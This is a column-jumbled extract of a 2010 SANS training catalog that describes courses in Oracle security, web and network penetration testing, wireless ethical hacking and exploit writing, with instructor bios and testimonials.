infrastructure. The course is also seasoned with plenty of SSH tips and tricks to overcome many
government, and academic common administrative obstacles. Students will get the opportunity to practice and experiment with
organizations in the country. these tools in class so that they can be ready to start using them as soon as they return to work.
Topics: SSH Tips and Tricks; Sudo; AIDE; Host-based Firewalls; Centralized Logging with Syslog-NG
He is the technical editor for
SysAdmin Magazine and was 506.4 Hands On – Part 1: Running Linux/Unix Applications Securely
the recipient of the 2001 SAGE This course examines common application security tools and techniques. The SCP-Only Shell will
Outstanding Achievement be presented as an example of using an application under chroot() restriction and as a more secure
alternative to file sharing protocols like anonymous FTP. The SELinux application whitelisting mecha-
award for his teaching and
nism will be examined in depth. Tips for troubleshooting common SELinux problems will be covered,
leadership in the field of and students will learn how to craft new SELinux policies from scratch for new and locally developed
system administration. Hal applications. Significant hands-on time will be provided for students to practice these concepts.
Topics: chroot() for Application Security; The SCP-Only Shell; SELinux Basics; SELinux and the Reference Policy; Application
participated in the first Security Challenge Exercise
SANS training program and
designed the SANS Step- 506.5 Hands On – Part 2: Running Linux/Unix Applications Securely
by-Step course model. He This course is a full day of in-depth analysis on how to manage some of the most popular application
level services securely on a Linux/Unix platform. We will tackle the practical issues involved with
is a top-rated instructor and securing three of the most commonly-used Internet servers on Linux and Unix: BIND, Sendmail, and
author on topics ranging from Apache. Beyond basic security configuration information, we will take an in-depth look at topics like
DNSSec and Web Application Firewalls with mod_security and the Core Rules.
information security to system
Topics: BIND; DNSSec; Sendmail; Apache; Web Application Firewalls with mod_security
and network management to
Perl programming. Hal also 506.6 Hands On: Digital Forensics for Linux/Unix
blogs about command-line tips This hands-on course is designed to be an information-rich introduction devoted to
on a regular basis. http://blog. basic forensic principals and techniques for investigating compromised Linux and
Unix systems. At a high level, it introduces the critical forensic concepts and tools
commandlinekungfu.com Register at
that every administrator should know and provides a real-world compromise
for students to investigate using the tools and strategies discussed in class. www.sans.org/
Topics: Tools Throughout; Forensic Preparation and Best Practices; Incident network-security-2010
Response and Evidence Acquisition; Media Analysis; Incident Reporting
September 19 - 29, 2010 57
SECURITY
509 Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010

Who Should Attend 9:00am-5:00pm • 36 CPE Credits • Laptop Required
• Oracle database administrators Instructor: Tanya Baccam
responsible for installation and
management of Oracle databases
Experts agree that Oracle
• Developers who wish to create secure data
access applications and Web sites is one of the most complex software
• Security professionals who are concerned packages available today.
about the security of their organization’s Unfortunately, complexity often introduces an increased risk
Oracle databases
for vulnerabilities. These vulnerabilities are being increasingly
• Auditors and penetration testers who need
to evaluate the security of Oracle databases targeted by attackers. It is not uncommon for the SANS Internet
• Security managers who need to understand

Storm Center to see hundreds of thousands of hack attempts
the security risks with data held in an Oracle against Oracle databases each month.
database
SANS recognizes the need for comprehensive Oracle security
training to help organizations protect their most critical infor-
mation resources. In this course, the student is led through the
process of auditing and securing Oracle by defining the risks
to data, using auditing techniques for detecting unauthorized
access attempts, using Oracle access controls and user manage-
ment functions, developing reliable backup and restore pro-
cesses and techniques to secure the Oracle database, as well as
applications.
Throughout the course the student will be exposed to the
database as seen through the eyes of an attacker, including
public and unreleased techniques that are used to compromise
AUTHOR STATEMENT the integrity of the database or escalate a user’s privileges. In
Oracle is one of the most exciting and challenging databases this fashion, the student gains a better understanding of how an
that exist. When it comes to securing an Oracle database, attacker sees a database as a target, and how we can configure
there are many challenges that Administrators and security
professionals will face. This course is designed to be a fully the database to be resistant to known and unknown attacks.
comprehensive and intense introduction to planning, audit- This course has been updated for versions of Oracle up to and
ing and securing an Oracle database. The course doesn’t just
mention the vulnerabilities, but it explains why the issues including 11g on Unix and Windows operating systems.
may exist and how they could be leveraged by an attacker.
Multiple hands-on exercises reinforce the content we learn
in class. This aids the student in thinking like an attacker,
which needs to be done to protect the databases. Students
are often amazed at how many different ways exist that “This course is excellent!
an attacker might use to compromise an Oracle database!
Ultimately, the goal is to teach how to protect one of the There is a wealth of information to be
most important organizational assets – the data. Data learned in this course. It is the best Oracle
provides information, information leads to knowledge and
knowledge is power in the business world. This course is an Security course I have taken thus far!
exciting and interesting journey on protecting this critical I highly recommend it!”
organizational asset! -Tanya Baccam
-ANGELA BELL, US GOVERNMENT ACCOUNTABILITY OFFICE

September 19 - 29, 2010
Securing Oracle gives students a solid grounding in how to audit and secure an Oracle database
installation. Students will develop the ability to define and implement solid robust Oracle security
standards and policies and learn to specify or create useful tools to audit an Oracle database and
understand how to secure it.
509.1 Hands On: Securing Oracle Foundations*

Students are introduced to various techniques used by an attacker to compromise the database includ-
ing buffer overflows, SQL injection attacks, exploiting Oracle stored procedures, and cross-site scripting
attacks. We also look at the process of installing the database in a secure fashion after hardening the
host operating system with strong filesystem permissions.
Topics: Securing Oracle; Foundations; Oracle Attack Vectors; Attacking Oracle; Host Operating System Security;
Hunting for Passwords
509.2 Hands On: Securing Oracle’s Authentication Process*

The Oracle authentication process is examined including single sign-on and unified
authentication with LDAP or the Oracle Internet Directory product. We also explore Oracle
default user accounts, roles, and grants including audit techniques to identify user accounts
with weak passwords using password cracking techniques. Auditing user accounts and application
schema accounts are also discussed in detail covering third party authentication, shared accounts, and
Senior Instructor
proxy users embedded accounts implemented in 3rd party applications. The day concludes with a
Tanya Baccam complete discussion of password management including enforcing and creating a password manage-
Tanya is a senior SANS ment policy and utilizing profiles to control access to database resources.
Topics: Authentication Methods; Default Users and Password Audits; Schema and Application Owners; Implementing
instructor as well as a SANS Password Management
courseware author. She
also provides many security
509.3 Hands On: Oracle Access Controls – Configuration*
This day examines techniques that can be used to deploy access control mechanisms in-depth by
consulting services, such as protecting database objects. We also cover many of the countless database configuration options
system audits, vulnerability with recommendations that make the database more resistant to common attacks. The final part
of the day is dedicated to the problems associated with the growing number of PUBLIC privileges
and risk assessments, database
including the techniques authenticated users can use to escalate their privilege levels.
assessments, Web application Topics: Access and Output; Roles and Users; Configuration; PUBLIC Privileges, Profiles, Packages and Objects
assessments, and penetration
509.4 Hands On: Auditing Oracle*
testing. She has previously This day delves into auditing the Oracle environment. We’ll examine the built-in Oracle auditing fea-
worked as the director of tures including the new enhancements to Fine Grain Auditing. Forensic assessment of Oracle data-
assurance services for a security bases is also covered in this day including data recovery and retracing the steps of an attacker. If your
organization is encumbered by federal restrictions in information management such as HIPAA or GLBA,
services consulting firm, as well
this day will provide vital information that you can deploy immediately after completing this course.
as manager of infrastructure Topics: Oracle Auditing - Myths and Facts; Reviewing the Audit Trail; Oracle Auditing - Myths and Facts; Reviewing the
Audit Trail; Forensics; Fine Grained Audit Forensics; Fine Grained Auditing
security for a healthcare
organization. She also served 509.5 Hands On: Networking, Encryption, and Developer Tools*
as a manager at Deloitte & The Oracle listener is usually the first recipient of attacks from adversaries seeking to compromise
the database. This day covers networking topics associated with the database including securing the
Touche in the Security Services listener configuration and network design recommendations for the database and administrative
practice. Throughout her workstations. The day continues to discuss the challenges of backup and restore of the database in-
career she has consulted cluding redo logs and database mirroring and media storage and destruction. We conclude the day
by looking at techniques to secure the SQL*Plus and iSQL*Plus tools including techniques to enforce
with many clients about their
and restrict the use of specific applications that are allowed to connect to the database.
security architecture, including Topics: Auditing the Oracle Listener; Network Access to Oracle; Database Backup and Recovery; Restricting Developer and
Access Tools
areas such as perimeter
security, network infrastructure 509.6 Hands On: Development and Securing Applications*
design, system audits, Web End-user tools created with PL/SQL and Java can introduce their own security risks. This day covers
secure programming for the database including protecting source confidentiality and integ-
server security, and database
rity and setting resource limits to prevent denial of service attacks. In addition, we look at
security. She has played an encrypting data and issues with tools such as debuggers. We also look at the most visible
integral role in developing Web-facing components of the database and cover some of the main security issues
of the Oracle application server. The final module of this intense day covers where
multiple business applications
we think Oracle security is going, exploring early techniques in the design of Register at
and currently holds the CPA, viruses and worms specific to Oracle. www.sans.org/
GCFW, GCIH, CISSP, CISM, CISA, Topics: Oracle Programming Issues; Controlling Applications; Application Internals;
Exercising Control; Introduction to Securing iAS; Oracle Security Future network-security-2010
CCNA, CCSE, CCSA, and Oracle
DBA certifications. *This course is available to Security 509 participants only.
September 19 - 29, 2010 59
SECURITY
542
Who Should Attend
36 CPE Credits • Laptop Required • Instructor: Kevin Johnson
• General security practitioners
• Web site designers and architects Assess Your Web Apps In Depth.
• Developers Web applications are a major point of vulnerability in organizations
today. Web app holes have resulted in the theft of millions of credit cards,
major financial and reputational damage for hundreds of enterprises, and even
the compromise of thousands of browsing machines that visited Web sites
altered by attackers. In this intermediate- to advanced-level class you’ll learn
the art of exploiting Web applications so you can find flaws in your enterprise’s
Web apps before the bad guys do. Through detailed, hands-on exercises and
training from a seasoned professional, you will be taught the four-step process
for Web application penetration testing. You will inject SQL into back-end
databases, learning how attackers exfiltrate sensitive data. You will utilize
Cross-Site Scripting attacks to dominate a target infrastructure in our unique
hands-on laboratory environment. And, you will explore various other Web app
vulnerabilities, in depth, with tried-and-true techniques to finding them, using a
structured testing regimen. You will learn the tools and methods of the attacker,
so that you can be a powerful defender.
On day one, we will study the attacker’s view of the Web, We will learn an
attack methodology and how the pen-tester uses JavaScript within the test.
On day two, we will study the art of reconnaissance, specifically targeted to Web
applications. We will also examine the mapping phase as we interact with a real
application to determine its internal structure. During day three, we will continue
our test by starting the discovery phase using the information we gathered on day
AUTHOR STATEMENT
Testing the security of Web two. We will focus on application/server-side discovery. On day four, we will continue
applications is not as simple as just discovery, focusing on client-side portions of the application, such as Flash objects
knowing what SQL injection and and Java applets. On day five, we will move into the final stage of exploitation.
cross-site scripting mean. Successful
Students will use advanced exploitation methods to gain further access within the
testers understand that methodical,
thorough testing is the best means application. Day six will be a Capture the Flag event where the students will be able
of finding the vulnerabilities within to use the methodology and techniques explored during class to find and exploit the
the applications. This requires a vulnerabilities within an intranet site.
deep understanding of how Web
applications work and what attack Throughout the class, you will learn the context behind the attacks so that you intui-
vectors are available. This course tively understand the real-life applications of our exploitation. In the end, you will
provides that understanding by be able to assess your own organization’s Web applications to find some of the most
examining the various parts of a
Web application penetration. When common and damaging Web application vulnerabilities today.
teaching the class, I especially enjoy
the use of real-world exercises and
the in-depth exploration of Web “This course was a huge
penetration testing.” eye opener for me. I will be
-Kevin Johnson
handling my future pen tests a lot
differently from now on.”
September 19 - 29, 2010 -CARL SKILES AMERINET www.giac.org www.sans.org/cyber-guardian
“This is the first course I have taken where I was completely
unaware of time – very engaging. Kevin is very knowledgeable
and an excellent representative of the SANS Institute.”
-SCOTT ASHTON, POLICE & FIRE FCU
542.1 Hands On: The Attacker’s View of the Web*

We begin by examining Web technology – protocols, languages, clients, and server architectures
– from the attacker’s perspective. Then we cover the four steps of Web application pen tests:
reconnaissance, mapping, discovery, and exploitation.
Topics: Overview of the Web from a Penetration Tester’s Perspective; Exploring the Various Servers and Clients; Discussion
of the Various Web Architectures; Discover How Session State Works; Discussion of the Different Types of
Vulnerabilities; Define a Web Application Test Scope and Process; Define Types of Penetration Testing
542.2 Hands On: Reconnaissance and Mapping*

Reconnaissance includes gathering publicly-available information regarding the target application
and organization, identifying machines that support our target application, and building a profile of
Certified Instructor each server. Then, we will build a “map” of the application by identifying the components, analyzing
Kevin Johnson the relationship between them, and determining how they work together.
Topics: Discover the Infrastructure Within the Application; Identify the Machines and Operating Systems; SSL
Kevin Johnson is a senior Configurations and Weaknesses; Explore Virtual Hosting and its Impact on Testing; Learn Methods to Identify Load
Balancers; Software Configuration Discovery; Explore External Information Sources; Google Hacking; Learn Tools
security analyst with to Spider a Web site; Scripting to Automate Web Requests and Spidering; Application Flow Charting; Relationship
InGuardians. Kevin came Analysis Within an Application; JavaScript for the Attacker
to security from a develop-

542.3 Hands On: Server-Side Discovery*
ment and system-admin- We will continue with the discovery phase, exploring both manual and automated methods of
istration background. He discovering vulnerabilities within the applications as well as exploring the interactions between the
various vulnerabilities and the different user interfaces that Web apps expose to clients.
has many years of experi-
Topics: Learn Methods to Discover Various Vulnerabilities; Explore Differences Between Different Data Back-ends; Explore
ence performing security Fuzzing and Various Fuzzing Tools; Discuss the Different Interfaces Web Sites Contain; Understand Methods for
Attacking Web Services
services for Fortune 100
companies and in his spare 542.4 Hands On: Client-Side Discovery*
time contributes to a large Learning how to discover vulnerabilities within client-side code, such as Java applets and Flash objects,
number of open-source includes use of tools to decompile the objects and applets. We have a detailed discussion of how
AJAX and Web service technology enlarges the attack surface that pen testers leverage.
security projects. Kevin Topics: Learn Methods to Discover Various Vulnerabilities; Learn Methods to Decompile Client-side Code; Explore Malicious
founded and leads the Applets and Objects; Discovery Vulnerabilities in Web Application Through Their Client Components; Understand
Methods for Attacking Web Services; Understand Methods for Testing Web 2.0 and AJAX-based Sites; Learn How
development on the Basic AJAX and Web Services Change Penetration Tests; Learn the Attacker’s Perspective on Python and PHP
Analysis and Security Engine

542.5 Hands On: Exploitation*
(BASE) project, the most
Launching exploits against real-world applications includes exploring how they can help in the testing
popular Web interface for process, gaining access to browser history, port scanning internal networks, and searching for other
the Snort intrusion detec- vulnerable Web applications through zombie browsers.
Topics: Explore Methods to Zombify Browsers; Discuss Using Zombies to Port Scan or Attack Internal Networks; Explore
tion system. Kevin is an Attack Frameworks; Walk Through an Entire Attack Scenario; Exploit the Various Vulnerabilities Discovered; Leverage
the Attacks to Gain Access to the System; Learn How to Pivot our Attacks Through a Web Application; Understand
instructor for SANS, teaching Methods of Interacting with a Server Through SQL Injection; Exploit Applications to Steal Cookies; Execute
both SEC504: Hacker Tech- Commands Through Web Application Vulnerabilities
niques, Exploits, and Incident

542.6 Hands On: Capture the Flag*
Handling and SEC542: Web The goal of this event is for students to use the techniques, tools, and methodology
App Penetration Testing learned in class against a realistic intranet application. Students will be able to use a
virtual machine with the SamuraiWTF Web pen testing environment in class and
and Ethical Hacking. He has
can apply that experience in their workplace.
presented to many organi-
Register at
Topics: Capture the Flag
www.sans.org/
zations, including Infragard,
ISACA, ISSA, and the Univer-
sity of Florida. *This course is available to Security 542 participants only.
September 19 - 29, 2010 61
SECURITY
560
Who Should Attend
36 CPE Credits • Laptop Required • Instructor: Ed Skoudis
• Penetration testers
• Ethical hackers
• Auditors who need to build Find Security Flaws Before the Bad Guys Do.
deeper technical skills Security vulnerabilities, such as weak configurations, unpatched systems,
• Security personnel whose and botched architectures, continue to plague organizations. Enterprises
job involves assessing target need people who can find these flaws in a professional manner to help eradicate
networks and systems to find
security vulnerabilities them from our infrastructures. Lots of people claim to have penetration testing,
ethical hacking, and security assessment skills, but precious few can apply these
skills in a methodical regimen of professional testing to help make an organiza-
tion more secure. This class covers the ingredients for successful network pen-
etration testing to help attendees improve their enterprise’s security stance.
We address detailed pre-test planning, including
IMPORTANT NOTE:
setting up an effective penetration testing
SEC560 is one of the most techni-
infrastructure and establishing ground rules with cally rigorous courses offered by
the target organization to avoid surprises and SANS. Attendees are expected
misunderstanding. Then we discuss a time-tested to have a working knowledge of
TCP/IP; cryptographic routines,
methodology for penetration and ethical hacking
such as DES, AES, and MD5;
across the network, evaluating the security of and the Windows and Linux
network services and the operating systems command lines before they step
behind them. into class. Although SEC401 and
SEC504 are not prerequisites
Attendees will learn how to perform detailed for SEC560, these courses cover
reconnaissance, learning about a target’s infrastructure the groundwork that all SEC560
by mining blogs, search engines, and social networking attendees are expected to
know. This course is technically
sites. We’ll then turn our attention to scanning, in-depth and programming
AUTHOR STATEMENT experimenting with numerous tools in hands-on knowledge is NOT required.
Successful penetration testers don’t exercises. Our exploitation phase will include the use
just throw a bunch of hacks against of exploitation frameworks, stand-alone exploits, and other valuable tactics, all with
an organization and regurgitate hands-on exercises in our lab environment. The class also discusses how to prepare a
the output of their tools. Instead, final report tailored to maximize the value of the test from both a management and
they need to understand how these
technical perspective. The final portion of the class includes a comprehensive hands-
tools work in depth and conduct
their test in a careful, professional on exercise in which students will conduct a penetration test against a hypothetical
manner. This course explains the target organization following all of the steps.
inner workings of numerous tools The course also describes the limitations of penetration testing techniques and
and their use in effective network
other practices that can be used to augment penetration testing
penetration testing and ethical
hacking projects. When teaching
to find vulnerabilities in architecture,
the class, I particularly enjoy the policies, and processes. We
hands-on exercises that culminate in address how penetration testing
a final pen-testing extravaganza lab. should be integrated as a piece
-Ed Skoudis of a comprehensive enterprise
information security program.
“This course offers a great overview of the methodology and
issues to consider when planning a penetration test.”
-GREG SUTHERLAND, MCKEE FOODS CORP
560.1 Hands On: Planning, Scoping, and Recon*

This course provides extensive details of penetration testing preparation and methodology, which are immensely useful
in meeting the Payment Card Industry (PCI) Data Security Standard (DSS) Requirement 11.3 on penetration testing.
We cover building a penetration testing and ethical hacking infrastructure that includes the
appropriate hardware, software, network infrastructure, and test tools arsenal, with specific low-
cost recommendations. This portion of the course also describes how to plan the specifics of a test,
carefully scoping the project and defining the rules of engagement.
Topics: The Mindset of the Professional Pen Tester; Legal Issues; Reporting; Types of Penetration Tests and Ethical
Hacking Projects; Detailed Recon; Mining Search Engine Results with Aura/Wikto/EvilAPI
560.2 Hands On: Scanning*

SANS Faculty Fellow
This component of the course focuses on the vital task of scanning a target environment, creating
Ed Skoudis a comprehensive inventory of machines, and then evaluating those systems to find potential
Ed Skoudis is a founder and senior vulnerabilities. We’ll look at some of the most useful scanning tools freely available today,
security consultant with InGuard- experimenting with them in our hands-on lab. Because vulnerability-scanning tools inevitably give
ians. Ed’s expertise includes hacker us false positives, we’ll also look at techniques for false-positive reduction with hands-on exercises.
attacks and defenses, the informa- Topics: Overall Scanning Tips; tcpdump for the Pen Tester; Protocol Anomalies; The Nmap Scripting Engine; Version
Scanning with Nmap and Amap; False Positive Reduction
tion security industry, and computer
privacy issues, with over fifteen 560.3 Hands On: Exploitation*
years of experience in information In this section we look at the many kinds of exploits that a penetration tester or ethical hacker
security. Ed authored and regu- can use to compromise a target machine. We’ll analyze in detail the differences between server-
larly teaches the SANS courses on side, client-side, and local privilege escalation exploits, exploring some of the most useful recent
network penetration testing (SEC560) exploits in each category. We’ll see how these exploits are packaged in frameworks like Metasploit
and incident response (SEC504), and its mighty Meterpreter. We’ll also look at post-exploit analysis of machines and pivoting to
find new targets.
helping over three thousand infor-
Topics: Comprehensive Metasploit Framework Coverage with Exploits/Stagers/Stages; Bypassing the Shell vs.
mation security professionals each Terminal Dilemma; Installing VNC/RDP/SSH with Only Shell Access; Running Windows Commands Remotely
year improve their skills and abilities with sc and wmic; Building Port Scanners and Password Guessers at the Command Line
to defend their networks. He has
performed numerous security
560.4 Hands On: Password Attacks*
assessments; conducted exhaus- This component turns our attention to password attacks, analyzing password guessing, password
cracking, and pass-the-hash techniques in depth. We’ll go over numerous tips based on real-world ex-
tive anti-virus, anti-spyware, Virtual
perience to help penetration testers and ethical hackers maximize the effectiveness of their password
Machine, and IPS research; and attacks with some of the most powerful attack tools available today for gaining access to machines.
responded to computer attacks for Topics: Pass-the-Hash Attacks Using Modified SMB Client Software; Patching John the Ripper to Squeeze Out
clients in financial, high technology, Maximum Performance; Rainbow Tables Hands-on and In-depth; Cain – The Pen Tester’s Dream Tool
healthcare, and other industries.
Ed conducted a demonstration of 560.5 Hands On: Wireless and Web Apps*
hacker techniques against financial This section describes methodologies for finding common wireless weaknesses, including
misconfigured access points, application of weak security protocols, and the improper
institutions for the United States
configuration of stronger security technologies. The second half focuses on Web application pen
Senate and is a frequent speaker on testing, and looking for the flaws that impact commercial and homegrown Web apps. Attendees
issues associated with hacker tools will work hands-on with tools that can find Cross-Site Scripting (XSS), Cross-Site Request Forgery
and defenses. He has published (XSRF), command injection, and SQL injection flaws, experimenting with each in several exercises.
numerous articles on these topics as Topics: Wireless Attacks; Discovering Access Points (Wire-Side and Wireless-Side); Wireless Crypto Flaws; Client-Side
well as the Prentice Hall best sellers Wireless Attacks; Cross-Site Scripting; Cross-Site Request Forgery; SQL Injection; Leveraging SQL Injection to
Perform Command Injection
Counter Hack Reloaded and Malware:
Fighting Malicious Code. Ed was also 560.6 Hands On: Penetration Testing Workshop and
awarded 2004-2009 Microsoft MVP
awards for Windows Server Security
Capture the Flag Event*
This lively session represents the culmination of the network penetration testing and
and is an alumnus of the Honeynet ethical hacking course, where attendees apply the skills mastered in the other
Project. Previous to InGuardians, Ed sessions in a hands-on workshop. The rest of the course covers the overall
served as a security consultant with process for successful testing with a series of hands-on exercises individually
International Network Services (INS), illustrating each point. But in this final workshop, all of the exercises
Register at
Global Integrity, Predictive Systems, converge in an overall network penetration-testing workout, where
SAIC, and Bell Communications attendees will function as part of a pen test team. www.sans.org/
Research (Bellcore). Ed also blogs Topics: Applying Penetration Testing and Ethical Hacking Practices End-to-end; network-security-2010
Scanning; Exploitation; Pivoting; Analyzing Results
about command line tips.
http://blog.commandlinekungfu.com *This course is available to Security 560 participants only.
September 19 - 29, 2010 63
SECURITY
617
Who Should Attend
36 CPE Credits • Laptop Required • Instructor: Joshua Wright
• Ethical Hackers and Penetration Testers
• Network Security Staff
• Network and System Administrators Despite the security concerns many of us share
• Incident Response Teams regarding wireless technology, it is here to stay.
• Information Security Policy Decision Makers In fact, not only is wireless here to stay, but it is growing in deployment
and utilization, not only with wireless LAN technology and WiFi, but
• Technical Auditors
also for other applications including cordless telephones, smart homes,
• Information Security Consultants embedded devices, and more. Technology such as ZigBee and WiMAX offer
• Wireless System Engineers new methods of connectivity to devices, while other wireless technology
including WiFi, Bluetooth, and DECT continue their massive growth rate, each
• Embedded Wireless System Developers
introducing their own set of security challenges and attacker opportunities.
To be a wireless security expert, you need to have a comprehensive
understanding of the technology, the threats, the exploits, and the defense
techniques along with hands-on experience in evaluating and attacking
wireless technology. Not limiting your skill-set to WiFi, you’ll need to evaluate
the threat from other standards-based and proprietary wireless technologies
as well. This course takes an in-depth look at the security challenges of many
different wireless technologies, exposing you to wireless security threats
through the eyes of an attacker. Using readily available and custom-developed
tools, you’ll navigate your way through the techniques attackers use to exploit
WiFi networks, including attacks against WEP, WPA/WPA2, PEAP, TTLS, and other
AUTHOR STATEMENT systems, including developing attack techniques leveraging Windows 7 and
It’s been amazing to watch the progression of wireless Mac OS X. We’ll also examine the commonly overlooked threats associated with
Bluetooth, ZigBee, DECT, and proprietary wireless systems. As part of the course,
technology over the past several years. WiFi has grown in
you’ll receive the SWAT Toolkit, which will be used in hands-on labs to back up
maturity and offers strong authentication and encryption
the course content and reinforce wireless ethical hacking techniques.
options to protect networks, and many organizations have
Using assessment and analysis techniques, this The SWAT Toolkit consists of:
migrated to this technology. At the same time, attackers are
course will show you how to identify the threats • USB Global Positioning System
becoming more sophisticated, and we’ve seen significant
that expose wireless technology and build (GPS) adapter
system breaches netting millions of payment cards that
on this knowledge to implement defensive • All software and tools used in lab
start with a wireless exploit. This pattern has me very techniques that can be used to protect wireless exercises based on Backtrack 4
concerned, as many organizations, even after deploying systems.
WPA2 and related technology, remain vulnerable to a In terms of technical content, this course ranks up at the top for in-depth,
number of attacks that expose their systems and internal comprehensive information about wireless security. However, you don’t need to
networks. In putting this class together, I wanted to help be an expert in wireless technology to succeed in this course. To help students
organizations recognize the multi-faceted wireless threat consume the course content, I’ve written extensive notes for every topic,
landscape and evaluate their exposure through ethical complete with review question and answer sections and recommendations for
hacking techniques. Moreover, I wanted my students to additional reading if you want to dig deeper. Many students comment that their
learn critical security analysis skills so that, while we focus favorite part about the course is the hands-on time, which makes up a significant
on evaluating wireless systems, the vulnerabilities and part of the course. Classroom labs are written such that even if you have never
attacks we leverage to exploit these systems can be applied used wireless technology or a Linux system before, you’ll be able to complete
to future technologies as well. In this manner, the skills all exercises, and reproduce your results against your own networks when you
return to the office. Combined with the excellent
you build in this class remain valuable for today’s wireless
SANS instructors, everyone
technology, tomorrow’s technology advancements, and for
can take this class and
other complex systems you have to evaluate in the future as gain useful and valuable
well. If you have questions or comments about this course, I skills for attacking and
would be very happy to hear from you. Please e-mail me at defending wireless
jwright@sans.org. -Joshua Wright networks.

Wireless Ethical Hacking, Penetration Testing, and Defenses After completing this course,
students will be prepared to evaluate and critique the security of wireless networks. Using auditing and
penetration-testing techniques, students will be able to demonstrate wireless security flaws and build
a clear assessment of the risks associated with a specific deployment. Using this information, students
will be able to design a secure wireless network that addresses the challenges of wireless technology.
617.1 Wireless Architecture and Analysis*

Students will identify the risks associated with modern wireless deployments as well as the character-
istics of physical layer radio frequency systems, including 802.11a/b/g and pre-802.11n systems. Stu-
dents will leverage open-source tools for analyzing wireless traffic and mapping wireless deployments.
Topics: Wireless Signal Exposure Threats; Identifying Threats in Wireless Networks; RF Signal Propagation and
Transmission Characteristics; RF Antenna Gain Types and Concepts; Physical Layer Coding Mechanisms;
Leveraging Tools Including Kismet, Wireshark, and gpsmap for Network Mapping and Identification
617.2 Hands On – Part 1: Wireless Security Exposed*

Students will develop an in-depth treatise on the IEEE 802.11 MAC layer and operating characteristics.
Using passive and active assessment techniques, students will evaluate deployment and implementa-
tion weaknesses, auditing against common implementation requirements, including PCI and the DoD
Senior Instructor Directive 8100.2. Security threats introduced with rogue networks will be examined from a defensive
Joshua Wright and penetration-testing perspective. Threats present in wireless hotspot networks will also be exam-
ined, identifying techniques attackers can use to manipulate guest or commercial hotspot environment.
Joshua Wright is a senior security Topics: IEEE 802.11 Framing; AP Fingerprinting; Kismet Post-Processing; Assessing Information Disclosure Threats;
Auditing Wireless Policy Compliance; Evading WIDS Systems with Custom Rogue APs; “Free Public WiFi” and
analyst with InGuardians, LLC and Ad-Hoc Networks; Wireless Device Triangulation; Webmail Session Hijacking; Defensive Measures for Guest
Network Deployment
a senior instructor with the SANS
Institute. A widely recognized 617.3 Hands On – Part 2: Wireless Security Exposed*
expert in the wireless security Students will continue their assessment of wireless security mechanisms, such as the identification
and compromise of static and dynamic WEP networks and exploiting weak authentication
field, Josh has worked with private techniques, including the Cisco LEAP protocol. Next-generation wireless threats will be assessed,
including attacks against client systems, such as network impersonation attacks and traffic
and government organizations to manipulation. Students will evaluate the security and threats associated with common wireless MAN
evaluate the threat surrounding technology, including proprietary and standards-based solutions.
Topics: Introduction to The RC4 Cipher; Understanding Failures in WEP; Leveraging Advanced Tools to Accelerate
wireless technology. As an WEP Cracking; Attacking MS-CHAPv2 Authentication Systems; Attacker Opportunities When Exploiting
Client Systems; Manipulating Plaintext Network Traffic; Attacking the Preferred Network List on Client
open-source enthusiast, Josh has Devices; Network Impersonation Attacks; Risks Associated with WMAN Technology; Assessing WiMAX Flaws
developed a variety of tools that
can be leveraged for penetration
617.4 Hands On – Part 3: Wireless Security Exposed*
Part three covers the evaluation of modern wireless encryption and authentication systems,
testing and security analysis. Prior identifying the benefits and flaws in WPA/WPA2 networks and common authentication systems.
Upper-layer encryption strategies for wireless security using IPSec are evaluated with in-depth
to joining InGuardians, Josh was coverage of denial-of-service attacks and techniques.
the senior security researcher Topics: Threats Associated with the WPA/TKIP Protocol; Implementing Offline Wordlist Attacks Against WPA/
WPA2-PSK Networks; Understanding the PEAP Authentication Exchange; Exploiting PEAP Through RADIUS
for Aruba Networks, leading a Impersonation; Recommendations for Securing Windows XP Supplicants; Exploiting Wireless Firmware
for DoS Attack; Wireless Packet Injection and Manipulation Techniques; VPN Network Fingerprinting and
team committed to significantly Analysis Tools
improving the security of modern 617.5 Hands On – Part 4: Wireless Security Exposed*
networks. In his spare time, Josh Advanced wireless testing and vulnerability discovery systems will be covered including 802.11
fuzzing techniques. A look at other wireless technology including proprietary systems, cellular
looks for any opportunity to void technology, and an in-depth coverage of Bluetooth risks will demonstrate the risks associated with
the warranty on wireless electronics. other forms of wireless systems and the impact to organizations.
Topics: Wireless Fuzzing Tools and Techniques; Vulnerability Disclosure Strategies; Discovering Unencrypted Video
Wright maintains a popular blog at Transmitters; Assessing Proprietary Wireless Devices; Traffic Sniffing in GSM Networks; Attacking SMS
Messages and Cellular Calls; Bluetooth Authentication and Pairing Exchange; Attacking Bluetooth Devices;
http://legal-beagle.typepad.com. Sniffing Bluetooth Networks; Eavesdropping on Bluetooth Headsets
617.6 Wireless Security Strategies and Implementation*

The final day of the course evaluates strategies and techniques for protecting wireless
systems. Students will examine the benefits and weaknesses of WLAN IDS systems while
gaining insight into the design and deployment of a public key infrastructure (PKI).
“Josh’s passion for wireless Students will also examine critical secure network design choices, including the
comes through in this course. selection of an EAP type, selecting an encryption strategy, and the management
of client configuration settings.
His knowledge is second to none Topics: WLAN IDS Signature and Anomaly Analysis Techniques; Understanding PKI Register at
Key Management Protocols; Deploying a Private Certificate Authority on www.sans.org/
and his desire to freely share this Linux and Windows Systems; Configuring Windows IAS for Wireless
Authentication; Configuring Windows XP Wireless Settings in Login network-security-2010
information is truly impressive.” Scripts
-CURTIS WISEMAN, AMBIR SOLUTIONS *This course is available to Security 617 participants only.
September 19 - 29, 2010 65
SECURITY
709
Who Should Attend 39 CPE Credits • Evening Bootcamp Sessions: 5:00pm - 7:00pm (Days 2-4)
• Incident handlers looking to take Laptop Required • Instructor: Stephen Sims
the next step in understanding
exploitation in its most technical form
Zero-day vulnerabilities are being
• Network and system security
professionals looking to understand discovered more frequently, and malicious
the methods used to write exploit computer attackers are constantly trying to
code and discover vulnerabilities
exploit them.
• Programmers and code review
engineers looking to understand the But when a new flaw is discovered, it is often difficult to determine
threat of exploitation and how to whether it is truly exploitable, making an analysis of business risk difficult,
write Proof of Concept (POC) code to if not impossible. Things get even murkier when the flaw is discovered
demonstrate exploitation techniques
in home-grown applications supporting an enterprise. Yet until now,
• Certification-holders looking to only a small, self-selected, high-tech “priesthood” of security researchers
improve and put their practical
have had the skills to determine whether a given flaw can lead directly to
knowledge to the test
exploitation.
• Anyone looking to build credibility
and take a technical course on Do you want to join the skilled security “Provides an interactive
advanced hacking techniques researcher elite and stop relying avenue for learning new
on others to find your application’s
material and building
vulnerabilities and start writing your
own Proof of Concept (POC) code? Do lasting relationships.”
you want the skills to be part of the -JASON COLEMAN, LRN CORP.
security researcher “priesthood”?
In this course we bridge the gaps and take a step-by-step look at Linux
